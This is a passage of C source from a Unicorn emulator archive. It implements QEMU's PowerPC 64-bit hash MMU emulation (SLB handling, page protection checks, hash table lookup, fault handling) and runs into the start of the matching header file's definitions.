return 0; } void helper_store_slb(CPUPPCState *env, target_ulong rb, target_ulong rs) { PowerPCCPU *cpu = env_archcpu(env); if (ppc_store_slb(cpu, rb & 0xfff, rb & ~0xfffULL, rs) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } } target_ulong helper_load_slb_esid(CPUPPCState *env, target_ulong rb) { PowerPCCPU *cpu = env_archcpu(env); target_ulong rt = 0; if (ppc_load_slb_esid(cpu, rb, &rt) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } return rt; } target_ulong helper_find_slb_vsid(CPUPPCState *env, target_ulong rb) { PowerPCCPU *cpu = env_archcpu(env); target_ulong rt = 0; if (ppc_find_slb_vsid(cpu, rb, &rt) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } return rt; } target_ulong helper_load_slb_vsid(CPUPPCState *env, target_ulong rb) { PowerPCCPU *cpu = env_archcpu(env); target_ulong rt = 0; if (ppc_load_slb_vsid(cpu, rb, &rt) < 0) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_INVAL, GETPC()); } return rt; } /* Check No-Execute or Guarded Storage */ static inline int ppc_hash64_pte_noexec_guard(PowerPCCPU *cpu, ppc_hash_pte64_t pte) { /* Exec permissions CANNOT take away read or write permissions */ return (pte.pte1 & HPTE64_R_N) || (pte.pte1 & HPTE64_R_G) ? PAGE_READ | PAGE_WRITE : PAGE_READ | PAGE_WRITE | PAGE_EXEC; } /* Check Basic Storage Protection */ static int ppc_hash64_pte_prot(PowerPCCPU *cpu, ppc_slb_t *slb, ppc_hash_pte64_t pte) { CPUPPCState *env = &cpu->env; unsigned pp, key; /* * Some pp bit combinations have undefined behaviour, so default * to no access in those cases */ int prot = 0; key = !!(msr_pr ? (slb->vsid & SLB_VSID_KP) : (slb->vsid & SLB_VSID_KS)); pp = (pte.pte1 & HPTE64_R_PP) | ((pte.pte1 & HPTE64_R_PP0) >> 61); if (key == 0) { switch (pp) { case 0x0: case 0x1: case 0x2: prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; break; case 0x3: case 0x6: prot = PAGE_READ | PAGE_EXEC; break; } } else { switch (pp) { case 0x0: case 0x6: break; case 0x1: case 0x3: prot = PAGE_READ | PAGE_EXEC; break; case 0x2: prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; break; } } return prot; } /* Check the instruction access permissions specified in the IAMR */ static int ppc_hash64_iamr_prot(PowerPCCPU *cpu, int key) { CPUPPCState *env = &cpu->env; int iamr_bits = (env->spr[SPR_IAMR] >> 2 * (31 - key)) & 0x3; /* * An instruction fetch is permitted if the IAMR bit is 0. * If the bit is set, return PAGE_READ | PAGE_WRITE because this bit * can only take away EXEC permissions not READ or WRITE permissions. * If bit is cleared return PAGE_READ | PAGE_WRITE | PAGE_EXEC since * EXEC permissions are allowed. */ return (iamr_bits & 0x1) ? PAGE_READ | PAGE_WRITE : PAGE_READ | PAGE_WRITE | PAGE_EXEC; } static int ppc_hash64_amr_prot(PowerPCCPU *cpu, ppc_hash_pte64_t pte) { CPUPPCState *env = &cpu->env; int key, amrbits; int prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; /* Only recent MMUs implement Virtual Page Class Key Protection */ if (!ppc_hash64_has(cpu, PPC_HASH64_AMR)) { return prot; } key = HPTE64_R_KEY(pte.pte1); amrbits = (env->spr[SPR_AMR] >> 2 * (31 - key)) & 0x3; /* fprintf(stderr, "AMR protection: key=%d AMR=0x%" PRIx64 "\n", key, */ /* env->spr[SPR_AMR]); */ /* * A store is permitted if the AMR bit is 0. Remove write * protection if it is set. */ if (amrbits & 0x2) { prot &= ~PAGE_WRITE; } /* * A load is permitted if the AMR bit is 0. Remove read * protection if it is set. 
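 *
 * Layout reminder: key k occupies two bits at position 2 * (31 - k) of
 * the AMR, the 0x2 bit denying stores and the 0x1 bit denying loads,
 * so 0x3 denies both and 0x0 grants full access for that class key.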
*/ if (amrbits & 0x1) { prot &= ~PAGE_READ; } switch (env->mmu_model) { /* * MMU version 2.07 and later support IAMR * Check if the IAMR allows the instruction access - it will return * PAGE_EXEC if it doesn't (and thus that bit will be cleared) or 0 * if it does (and prot will be unchanged indicating execution support). */ case POWERPC_MMU_2_07: case POWERPC_MMU_3_00: prot &= ppc_hash64_iamr_prot(cpu, key); break; default: break; } return prot; } const ppc_hash_pte64_t *ppc_hash64_map_hptes(PowerPCCPU *cpu, hwaddr ptex, int n) { hwaddr pte_offset = ptex * HASH_PTE_SIZE_64; hwaddr base; hwaddr plen = n * HASH_PTE_SIZE_64; const ppc_hash_pte64_t *hptes; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); return vhc->map_hptes(cpu->vhyp, ptex, n); } #endif base = ppc_hash64_hpt_base(cpu); if (!base) { return NULL; } hptes = address_space_map(CPU(cpu)->as, base + pte_offset, &plen, false, MEMTXATTRS_UNSPECIFIED); if (plen < (n * HASH_PTE_SIZE_64)) { fprintf(stderr, "%s: Unable to map all requested HPTEs\n", __func__); } return hptes; } void ppc_hash64_unmap_hptes(PowerPCCPU *cpu, const ppc_hash_pte64_t *hptes, hwaddr ptex, int n) { #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->unmap_hptes(cpu->vhyp, hptes, ptex, n); return; } #endif address_space_unmap(CPU(cpu)->as, (void *)hptes, n * HASH_PTE_SIZE_64, false, n * HASH_PTE_SIZE_64); } static unsigned hpte_page_shift(const PPCHash64SegmentPageSizes *sps, uint64_t pte0, uint64_t pte1) { int i; if (!(pte0 & HPTE64_V_LARGE)) { if (sps->page_shift != 12) { /* 4kiB page in a non 4kiB segment */ return 0; } /* Normal 4kiB page */ return 12; } for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64PageSize *ps = &sps->enc[i]; uint64_t mask; if (!ps->page_shift) { break; } if (ps->page_shift == 12) { /* L bit is set so this can't be a 4kiB page */ continue; } mask = ((1ULL << ps->page_shift) - 1) & HPTE64_R_RPN; if ((pte1 & mask) == ((uint64_t)ps->pte_enc << HPTE64_R_RPN_SHIFT)) { return ps->page_shift; } } return 0; /* Bad page size encoding */ } static void ppc64_v3_new_to_old_hpte(target_ulong *pte0, target_ulong *pte1) { /* Insert B into pte0 */ *pte0 = (*pte0 & HPTE64_V_COMMON_BITS) | ((*pte1 & HPTE64_R_3_0_SSIZE_MASK) << (HPTE64_V_SSIZE_SHIFT - HPTE64_R_3_0_SSIZE_SHIFT)); /* Remove B from pte1 */ *pte1 = *pte1 & ~HPTE64_R_3_0_SSIZE_MASK; } static hwaddr ppc_hash64_pteg_search(PowerPCCPU *cpu, hwaddr hash, const PPCHash64SegmentPageSizes *sps, target_ulong ptem, ppc_hash_pte64_t *pte, unsigned *pshift) { int i; const ppc_hash_pte64_t *pteg; target_ulong pte0, pte1; target_ulong ptex; ptex = (hash & ppc_hash64_hpt_mask(cpu)) * HPTES_PER_GROUP; pteg = ppc_hash64_map_hptes(cpu, ptex, HPTES_PER_GROUP); if (!pteg) { return -1; } for (i = 0; i < HPTES_PER_GROUP; i++) { pte0 = ppc_hash64_hpte0(cpu, pteg, i); /* * pte0 contains the valid bit and must be read before pte1, * otherwise we might see an old pte1 with a new valid bit and * thus an inconsistent hpte value */ smp_rmb(); pte1 = ppc_hash64_hpte1(cpu, pteg, i); /* Convert format if necessary */ if (cpu->env.mmu_model == POWERPC_MMU_3_00) { ppc64_v3_new_to_old_hpte(&pte0, &pte1); } /* This compares V, B, H (secondary) and the AVPN */ if (HPTE64_V_COMPARE(pte0, ptem)) { *pshift = hpte_page_shift(sps, pte0, pte1); /* * If there is no match, ignore the PTE, it could simply * be for a different segment size encoding and the * architecture specifies we should not match. 
Linux will * potentially leave behind PTEs for the wrong base page * size when demoting segments. */ if (*pshift == 0) { continue; } /* * We don't do anything with pshift yet as qemu TLB only * deals with 4K pages anyway */ pte->pte0 = pte0; pte->pte1 = pte1; ppc_hash64_unmap_hptes(cpu, pteg, ptex, HPTES_PER_GROUP); return ptex + i; } } ppc_hash64_unmap_hptes(cpu, pteg, ptex, HPTES_PER_GROUP); /* * We didn't find a valid entry. */ return -1; } static hwaddr ppc_hash64_htab_lookup(PowerPCCPU *cpu, ppc_slb_t *slb, target_ulong eaddr, ppc_hash_pte64_t *pte, unsigned *pshift) { CPUPPCState *env = &cpu->env; hwaddr hash, ptex; uint64_t vsid, epnmask, epn, ptem; const PPCHash64SegmentPageSizes *sps = slb->sps; /* * The SLB store path should prevent any bad page size encodings * getting in there, so: */ assert(sps); /* If ISL is set in LPCR we need to clamp the page size to 4K */ if (env->spr[SPR_LPCR] & LPCR_ISL) { /* We assume that when using TCG, 4k is first entry of SPS */ sps = &cpu->hash64_opts->sps[0]; assert(sps->page_shift == 12); } epnmask = ~((1ULL << sps->page_shift) - 1); if (slb->vsid & SLB_VSID_B) { /* 1TB segment */ vsid = (slb->vsid & SLB_VSID_VSID) >> SLB_VSID_SHIFT_1T; epn = (eaddr & ~SEGMENT_MASK_1T) & epnmask; hash = vsid ^ (vsid << 25) ^ (epn >> sps->page_shift); } else { /* 256M segment */ vsid = (slb->vsid & SLB_VSID_VSID) >> SLB_VSID_SHIFT; epn = (eaddr & ~SEGMENT_MASK_256M) & epnmask; hash = vsid ^ (epn >> sps->page_shift); } ptem = (slb->vsid & SLB_VSID_PTEM) | ((epn >> 16) & HPTE64_V_AVPN); ptem |= HPTE64_V_VALID; /* Page address translation */ qemu_log_mask(CPU_LOG_MMU, "htab_base " TARGET_FMT_plx " htab_mask " TARGET_FMT_plx " hash " TARGET_FMT_plx "\n", ppc_hash64_hpt_base(cpu), ppc_hash64_hpt_mask(cpu), hash); /* Primary PTEG lookup */ qemu_log_mask(CPU_LOG_MMU, "0 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=" TARGET_FMT_lx " ptem=" TARGET_FMT_lx " hash=" TARGET_FMT_plx "\n", ppc_hash64_hpt_base(cpu), ppc_hash64_hpt_mask(cpu), vsid, ptem, hash); ptex = ppc_hash64_pteg_search(cpu, hash, sps, ptem, pte, pshift); if (ptex == -1) { /* Secondary PTEG lookup */ ptem |= HPTE64_V_SECONDARY; qemu_log_mask(CPU_LOG_MMU, "1 htab=" TARGET_FMT_plx "/" TARGET_FMT_plx " vsid=" TARGET_FMT_lx " api=" TARGET_FMT_lx " hash=" TARGET_FMT_plx "\n", ppc_hash64_hpt_base(cpu), ppc_hash64_hpt_mask(cpu), vsid, ptem, ~hash); ptex = ppc_hash64_pteg_search(cpu, ~hash, sps, ptem, pte, pshift); } return ptex; } unsigned ppc_hash64_hpte_page_shift_noslb(PowerPCCPU *cpu, uint64_t pte0, uint64_t pte1) { int i; if (!(pte0 & HPTE64_V_LARGE)) { return 12; } /* * The encodings in env->sps need to be carefully chosen so that * this gives an unambiguous result. 
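 * Concretely, a given HPTE (the L bit plus the pte_enc bits in pte1)
 * must match at most one page size across all sps[] entries, since
 * there is no SLB entry here to pick the segment's base page size.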
*/ for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64SegmentPageSizes *sps = &cpu->hash64_opts->sps[i]; unsigned shift; if (!sps->page_shift) { break; } shift = hpte_page_shift(sps, pte0, pte1); if (shift) { return shift; } } return 0; } static bool ppc_hash64_use_vrma(CPUPPCState *env) { switch (env->mmu_model) { case POWERPC_MMU_3_00: /* * ISAv3.0 (POWER9) always uses VRMA, the VPM0 field and RMOR * register no longer exist */ return true; default: return !!(env->spr[SPR_LPCR] & LPCR_VPM0); } } static void ppc_hash64_set_isi(CPUState *cs, uint64_t error_code) { CPUPPCState *env = &POWERPC_CPU(cs)->env; bool vpm; if (msr_ir) { vpm = !!(env->spr[SPR_LPCR] & LPCR_VPM1); } else { vpm = ppc_hash64_use_vrma(env); } if (vpm && !msr_hv) { cs->exception_index = POWERPC_EXCP_HISI; } else { cs->exception_index = POWERPC_EXCP_ISI; } env->error_code = error_code; } static void ppc_hash64_set_dsi(CPUState *cs, uint64_t dar, uint64_t dsisr) { CPUPPCState *env = &POWERPC_CPU(cs)->env; bool vpm; if (msr_dr) { vpm = !!(env->spr[SPR_LPCR] & LPCR_VPM1); } else { vpm = ppc_hash64_use_vrma(env); } if (vpm && !msr_hv) { cs->exception_index = POWERPC_EXCP_HDSI; env->spr[SPR_HDAR] = dar; env->spr[SPR_HDSISR] = dsisr; } else { cs->exception_index = POWERPC_EXCP_DSI; env->spr[SPR_DAR] = dar; env->spr[SPR_DSISR] = dsisr; } env->error_code = 0; } static void ppc_hash64_set_r(PowerPCCPU *cpu, hwaddr ptex, uint64_t pte1) { hwaddr base, offset = ptex * HASH_PTE_SIZE_64 + 16; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->hpte_set_r(cpu->vhyp, ptex, pte1); return; } #endif base = ppc_hash64_hpt_base(cpu); /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, ((pte1 >> 8) & 0xff) | 0x01); #endif } static void ppc_hash64_set_c(PowerPCCPU *cpu, hwaddr ptex, uint64_t pte1) { hwaddr base, offset = ptex * HASH_PTE_SIZE_64 + 15; #if 0 if (cpu->vhyp) { PPCVirtualHypervisorClass *vhc = PPC_VIRTUAL_HYPERVISOR_GET_CLASS(cpu->vhyp); vhc->hpte_set_c(cpu->vhyp, ptex, pte1); return; } #endif base = ppc_hash64_hpt_base(cpu); /* The HW performs a non-atomic byte update */ #ifdef UNICORN_ARCH_POSTFIX glue(stb_phys, UNICORN_ARCH_POSTFIX)(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #else stb_phys(cpu->env.uc, CPU(cpu)->as, base + offset, (pte1 & 0xff) | 0x80); #endif } static target_ulong rmls_limit(PowerPCCPU *cpu) { CPUPPCState *env = &cpu->env; /* * In theory the meanings of RMLS values are implementation * dependent. In practice, this seems to have been the set from * POWER4+..POWER8, and RMLS is no longer supported in POWER9. * * Unsupported values mean the OS has shot itself in the * foot. 
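 * (RMLS is a 4-bit field; encodings missing from the rma_sizes[]
 * table below simply stay zero-initialized.)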
Return a 0-sized RMA in this case, which we expect * to trigger an immediate DSI or ISI */ static const target_ulong rma_sizes[16] = { [0] = 256 * GiB, [1] = 16 * GiB, [2] = 1 * GiB, [3] = 64 * MiB, [4] = 256 * MiB, [7] = 128 * MiB, [8] = 32 * MiB, }; target_ulong rmls = (env->spr[SPR_LPCR] & LPCR_RMLS) >> LPCR_RMLS_SHIFT; return rma_sizes[rmls]; } static int build_vrma_slbe(PowerPCCPU *cpu, ppc_slb_t *slb) { CPUPPCState *env = &cpu->env; target_ulong lpcr = env->spr[SPR_LPCR]; uint32_t vrmasd = (lpcr & LPCR_VRMASD) >> LPCR_VRMASD_SHIFT; target_ulong vsid = SLB_VSID_VRMA | ((vrmasd << 4) & SLB_VSID_LLP_MASK); int i; for (i = 0; i < PPC_PAGE_SIZES_MAX_SZ; i++) { const PPCHash64SegmentPageSizes *sps = &cpu->hash64_opts->sps[i]; if (!sps->page_shift) { break; } if ((vsid & SLB_VSID_LLP_MASK) == sps->slb_enc) { slb->esid = SLB_ESID_V; slb->vsid = vsid; slb->sps = sps; return 0; } } #if 0 error_report("Bad page size encoding in LPCR[VRMASD]; LPCR=0x" TARGET_FMT_lx"\n", lpcr); #endif return -1; } int ppc_hash64_handle_mmu_fault(PowerPCCPU *cpu, vaddr eaddr, int rwx, int mmu_idx) { CPUState *cs = CPU(cpu); CPUPPCState *env = &cpu->env; ppc_slb_t vrma_slbe; ppc_slb_t *slb; unsigned apshift; hwaddr ptex; ppc_hash_pte64_t pte; int exec_prot, pp_prot, amr_prot, prot; const int need_prot[] = {PAGE_READ, PAGE_WRITE, PAGE_EXEC}; hwaddr raddr; assert((rwx == 0) || (rwx == 1) || (rwx == 2)); /* * Note on LPCR usage: 970 uses HID4, but our special variant of * store_spr copies relevant fields into env->spr[SPR_LPCR]. * Similarily we filter unimplemented bits when storing into LPCR * depending on the MMU version. This code can thus just use the * LPCR "as-is". */ /* 1. Handle real mode accesses */ if (((rwx == 2) && (msr_ir == 0)) || ((rwx != 2) && (msr_dr == 0))) { /* * Translation is supposedly "off", but in real mode the top 4 * effective address bits are (mostly) ignored */ raddr = eaddr & 0x0FFFFFFFFFFFFFFFULL; #if 0 if (cpu->vhyp) { /* * In virtual hypervisor mode, there's nothing to do: * EA == GPA == qemu guest address */ } else #endif if (msr_hv || !env->has_hv_mode) { /* In HV mode, add HRMOR if top EA bit is clear */ if (!(eaddr >> 63)) { raddr |= env->spr[SPR_HRMOR]; } } else if (ppc_hash64_use_vrma(env)) { /* Emulated VRMA mode */ slb = &vrma_slbe; if (build_vrma_slbe(cpu, slb) != 0) { /* Invalid VRMA setup, machine check */ cs->exception_index = POWERPC_EXCP_MCHECK; env->error_code = 0; return 1; } goto skip_slb_search; } else { target_ulong limit = rmls_limit(cpu); /* Emulated old-style RMO mode, bounds check against RMLS */ if (raddr >= limit) { if (rwx == 2) { ppc_hash64_set_isi(cs, SRR1_PROTFAULT); } else { int dsisr = DSISR_PROTFAULT; if (rwx == 1) { dsisr |= DSISR_ISSTORE; } ppc_hash64_set_dsi(cs, eaddr, dsisr); } return 1; } raddr |= env->spr[SPR_RMOR]; } tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, PAGE_READ | PAGE_WRITE | PAGE_EXEC, mmu_idx, TARGET_PAGE_SIZE); return 0; } /* 2. Translation is on, so look up the SLB */ slb = slb_lookup(cpu, eaddr); if (!slb) { /* No entry found, check if in-memory segment tables are in use */ if (ppc64_use_proc_tbl(cpu)) { /* TODO - Unsupported */ fprintf(stderr, "Segment Table Support Unimplemented"); exit(1); } /* Segment still not found, generate the appropriate interrupt */ if (rwx == 2) { cs->exception_index = POWERPC_EXCP_ISEG; env->error_code = 0; } else { cs->exception_index = POWERPC_EXCP_DSEG; env->error_code = 0; env->spr[SPR_DAR] = eaddr; } return 1; } skip_slb_search: /* 3. 
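Check for segment level no-execute violation. Reminder: throughout
 * this function, rwx encodes the access type: 0 = data load, 1 = data
 * store, 2 = instruction fetch (cf. the need_prot[] table above). */

/* 3 (continued):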
Check for segment level no-execute violation */ if ((rwx == 2) && (slb->vsid & SLB_VSID_N)) { ppc_hash64_set_isi(cs, SRR1_NOEXEC_GUARD); return 1; } /* 4. Locate the PTE in the hash table */ ptex = ppc_hash64_htab_lookup(cpu, slb, eaddr, &pte, &apshift); if (ptex == -1) { if (rwx == 2) { ppc_hash64_set_isi(cs, SRR1_NOPTE); } else { int dsisr = DSISR_NOPTE; if (rwx == 1) { dsisr |= DSISR_ISSTORE; } ppc_hash64_set_dsi(cs, eaddr, dsisr); } return 1; } qemu_log_mask(CPU_LOG_MMU, "found PTE at index %08" HWADDR_PRIx "\n", ptex); /* 5. Check access permissions */ exec_prot = ppc_hash64_pte_noexec_guard(cpu, pte); pp_prot = ppc_hash64_pte_prot(cpu, slb, pte); amr_prot = ppc_hash64_amr_prot(cpu, pte); prot = exec_prot & pp_prot & amr_prot; if ((need_prot[rwx] & ~prot) != 0) { /* Access right violation */ qemu_log_mask(CPU_LOG_MMU, "PTE access rejected\n"); if (rwx == 2) { int srr1 = 0; if (PAGE_EXEC & ~exec_prot) { srr1 |= SRR1_NOEXEC_GUARD; /* Access violates noexec or guard */ } else if (PAGE_EXEC & ~pp_prot) { srr1 |= SRR1_PROTFAULT; /* Access violates access authority */ } if (PAGE_EXEC & ~amr_prot) { srr1 |= SRR1_IAMR; /* Access violates virt pg class key prot */ } ppc_hash64_set_isi(cs, srr1); } else { int dsisr = 0; if (need_prot[rwx] & ~pp_prot) { dsisr |= DSISR_PROTFAULT; } if (rwx == 1) { dsisr |= DSISR_ISSTORE; } if (need_prot[rwx] & ~amr_prot) { dsisr |= DSISR_AMR; } ppc_hash64_set_dsi(cs, eaddr, dsisr); } return 1; } qemu_log_mask(CPU_LOG_MMU, "PTE access granted !\n"); /* 6. Update PTE referenced and changed bits if necessary */ if (!(pte.pte1 & HPTE64_R_R)) { ppc_hash64_set_r(cpu, ptex, pte.pte1); } if (!(pte.pte1 & HPTE64_R_C)) { if (rwx == 1) { ppc_hash64_set_c(cpu, ptex, pte.pte1); } else { /* * Treat the page as read-only for now, so that a later write * will pass through this function again to set the C bit */ prot &= ~PAGE_WRITE; } } /* 7. 
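Determine the real address from the PTE: deposit64(rpn, 0, apshift,
 * eaddr) keeps the real page number from the PTE and substitutes the
 * low apshift bits of the effective address as the byte offset; for a
 * 64 KiB page apshift is 16, so the low 16 bits of eaddr survive. */

/* 7 (continued):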
Determine the real address from the PTE */ raddr = deposit64(pte.pte1 & HPTE64_R_RPN, 0, apshift, eaddr); tlb_set_page(cs, eaddr & TARGET_PAGE_MASK, raddr & TARGET_PAGE_MASK, prot, mmu_idx, 1ULL << apshift); return 0; } hwaddr ppc_hash64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr) { CPUPPCState *env = &cpu->env; ppc_slb_t vrma_slbe; ppc_slb_t *slb; hwaddr ptex, raddr; ppc_hash_pte64_t pte; unsigned apshift; /* Handle real mode */ if (msr_dr == 0) { /* In real mode the top 4 effective address bits are ignored */ raddr = addr & 0x0FFFFFFFFFFFFFFFULL; #if 0 if (cpu->vhyp) { /* * In virtual hypervisor mode, there's nothing to do: * EA == GPA == qemu guest address */ return raddr; } else #endif if ((msr_hv || !env->has_hv_mode) && !(addr >> 63)) { /* In HV mode, add HRMOR if top EA bit is clear */ return raddr | env->spr[SPR_HRMOR]; } else if (ppc_hash64_use_vrma(env)) { /* Emulated VRMA mode */ slb = &vrma_slbe; if (build_vrma_slbe(cpu, slb) != 0) { return -1; } } else { target_ulong limit = rmls_limit(cpu); /* Emulated old-style RMO mode, bounds check against RMLS */ if (raddr >= limit) { return -1; } return raddr | env->spr[SPR_RMOR]; } } else { slb = slb_lookup(cpu, addr); if (!slb) { return -1; } } ptex = ppc_hash64_htab_lookup(cpu, slb, addr, &pte, &apshift); if (ptex == -1) { return -1; } return deposit64(pte.pte1 & HPTE64_R_RPN, 0, apshift, addr) & TARGET_PAGE_MASK; } void ppc_hash64_tlb_flush_hpte(PowerPCCPU *cpu, target_ulong ptex, target_ulong pte0, target_ulong pte1) { /* * XXX: given the fact that there are too many segments to * invalidate, and we still don't have a tlb_flush_mask(env, n, * mask) in QEMU, we just invalidate all TLBs */ cpu->env.tlb_need_flush = TLB_NEED_GLOBAL_FLUSH | TLB_NEED_LOCAL_FLUSH; } void ppc_store_lpcr(PowerPCCPU *cpu, target_ulong val) { PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); CPUPPCState *env = &cpu->env; env->spr[SPR_LPCR] = val & pcc->lpcr_mask; } void helper_store_lpcr(CPUPPCState *env, target_ulong val) { PowerPCCPU *cpu = env_archcpu(env); ppc_store_lpcr(cpu, val); } void ppc_hash64_init(PowerPCCPU *cpu) { #ifndef NDEBUG CPUPPCState *env = &cpu->env; #endif PowerPCCPUClass *pcc = POWERPC_CPU_GET_CLASS(cpu); if (!pcc->hash64_opts) { #ifndef NDEBUG assert(!(env->mmu_model & POWERPC_MMU_64)); #endif return; } cpu->hash64_opts = g_memdup(pcc->hash64_opts, sizeof(*cpu->hash64_opts)); } void ppc_hash64_finalize(PowerPCCPU *cpu) { g_free(cpu->hash64_opts); } const PPCHash64Options ppc_hash64_opts_basic = { .flags = 0, .slb_size = 64, .sps = { { .page_shift = 12, /* 4K */ .slb_enc = 0, .enc = { { .page_shift = 12, .pte_enc = 0 } } }, { .page_shift = 24, /* 16M */ .slb_enc = 0x100, .enc = { { .page_shift = 24, .pte_enc = 0 } } }, }, }; const PPCHash64Options ppc_hash64_opts_POWER7 = { .flags = PPC_HASH64_1TSEG | PPC_HASH64_AMR | PPC_HASH64_CI_LARGEPAGE, .slb_size = 32, .sps = { { .page_shift = 12, /* 4K */ .slb_enc = 0, .enc = { { .page_shift = 12, .pte_enc = 0 }, { .page_shift = 16, .pte_enc = 0x7 }, { .page_shift = 24, .pte_enc = 0x38 }, }, }, { .page_shift = 16, /* 64K */ .slb_enc = SLB_VSID_64K, .enc = { { .page_shift = 16, .pte_enc = 0x1 }, { .page_shift = 24, .pte_enc = 0x8 }, }, }, { .page_shift = 24, /* 16M */ .slb_enc = SLB_VSID_16M, .enc = { { .page_shift = 24, .pte_enc = 0 }, }, }, { .page_shift = 34, /* 16G */ .slb_enc = SLB_VSID_16G, .enc = { { .page_shift = 34, .pte_enc = 0x3 }, }, }, } }; void ppc_hash64_filter_pagesizes(PowerPCCPU *cpu, bool (*cb)(void *, uint32_t, uint32_t), void *opaque) { PPCHash64Options *opts = 
cpu->hash64_opts; int i; int n = 0; bool ci_largepage = false; assert(opts); n = 0; for (i = 0; i < ARRAY_SIZE(opts->sps); i++) { PPCHash64SegmentPageSizes *sps = &opts->sps[i]; int j; int m = 0; assert(n <= i); if (!sps->page_shift) { break; } for (j = 0; j < ARRAY_SIZE(sps->enc); j++) { PPCHash64PageSize *ps = &sps->enc[j]; assert(m <= j); if (!ps->page_shift) { break; } if (cb(opaque, sps->page_shift, ps->page_shift)) { if (ps->page_shift >= 16) { ci_largepage = true; } sps->enc[m++] = *ps; } } /* Clear rest of the row */ for (j = m; j < ARRAY_SIZE(sps->enc); j++) { memset(&sps->enc[j], 0, sizeof(sps->enc[j])); } if (m) { n++; } } /* Clear the rest of the table */ for (i = n; i < ARRAY_SIZE(opts->sps); i++) { memset(&opts->sps[i], 0, sizeof(opts->sps[i])); } if (!ci_largepage) { opts->flags &= ~PPC_HASH64_CI_LARGEPAGE; } } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/mmu-hash64.h����������������������������������������������������������0000664�0000000�0000000�00000014104�14675241067�0020265�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef MMU_HASH64_H #define MMU_HASH64_H #ifdef TARGET_PPC64 void dump_slb(PowerPCCPU *cpu); int ppc_store_slb(PowerPCCPU *cpu, target_ulong slot, target_ulong esid, target_ulong vsid); hwaddr ppc_hash64_get_phys_page_debug(PowerPCCPU *cpu, target_ulong addr); int ppc_hash64_handle_mmu_fault(PowerPCCPU *cpu, vaddr address, int rw, int mmu_idx); void ppc_hash64_tlb_flush_hpte(PowerPCCPU *cpu, target_ulong pte_index, target_ulong pte0, target_ulong pte1); unsigned ppc_hash64_hpte_page_shift_noslb(PowerPCCPU *cpu, uint64_t pte0, uint64_t pte1); void ppc_store_lpcr(PowerPCCPU *cpu, target_ulong val); void ppc_hash64_init(PowerPCCPU *cpu); void ppc_hash64_finalize(PowerPCCPU *cpu); void ppc_hash64_filter_pagesizes(PowerPCCPU *cpu, bool (*cb)(void *, uint32_t, uint32_t), void *opaque); #endif /* * SLB definitions */ /* Bits in the SLB ESID word */ #define SLB_ESID_ESID 0xFFFFFFFFF0000000ULL #define SLB_ESID_V 0x0000000008000000ULL /* valid */ /* Bits in the SLB VSID word */ #define SLB_VSID_SHIFT 12 #define SLB_VSID_SHIFT_1T 24 #define SLB_VSID_SSIZE_SHIFT 62 #define SLB_VSID_B 0xc000000000000000ULL #define SLB_VSID_B_256M 0x0000000000000000ULL #define SLB_VSID_B_1T 0x4000000000000000ULL #define SLB_VSID_VSID 0x3FFFFFFFFFFFF000ULL #define SLB_VSID_VRMA (0x0001FFFFFF000000ULL | SLB_VSID_B_1T) #define SLB_VSID_PTEM (SLB_VSID_B | SLB_VSID_VSID) #define SLB_VSID_KS 0x0000000000000800ULL #define SLB_VSID_KP 0x0000000000000400ULL #define SLB_VSID_N 0x0000000000000200ULL /* no-execute */ #define SLB_VSID_L 0x0000000000000100ULL #define SLB_VSID_C 0x0000000000000080ULL /* class */ #define SLB_VSID_LP 0x0000000000000030ULL #define SLB_VSID_ATTR 0x0000000000000FFFULL #define SLB_VSID_LLP_MASK (SLB_VSID_L | SLB_VSID_LP) #define SLB_VSID_4K 0x0000000000000000ULL #define SLB_VSID_64K 0x0000000000000110ULL #define SLB_VSID_16M 0x0000000000000100ULL #define SLB_VSID_16G 0x0000000000000120ULL /* * Hash page table definitions */ #define SDR_64_HTABORG 0x0FFFFFFFFFFC0000ULL 
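/* HTABORG is the 256 KiB-aligned real address of the hash table;
 * HTABSIZE encodes its size as 2^(18 + HTABSIZE) bytes -- see
 * ppc_hash64_hpt_mask() in mmu-book3s-v3.h, which derives the PTEG
 * mask as (1ULL << (HTABSIZE + 18 - 7)) - 1. */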
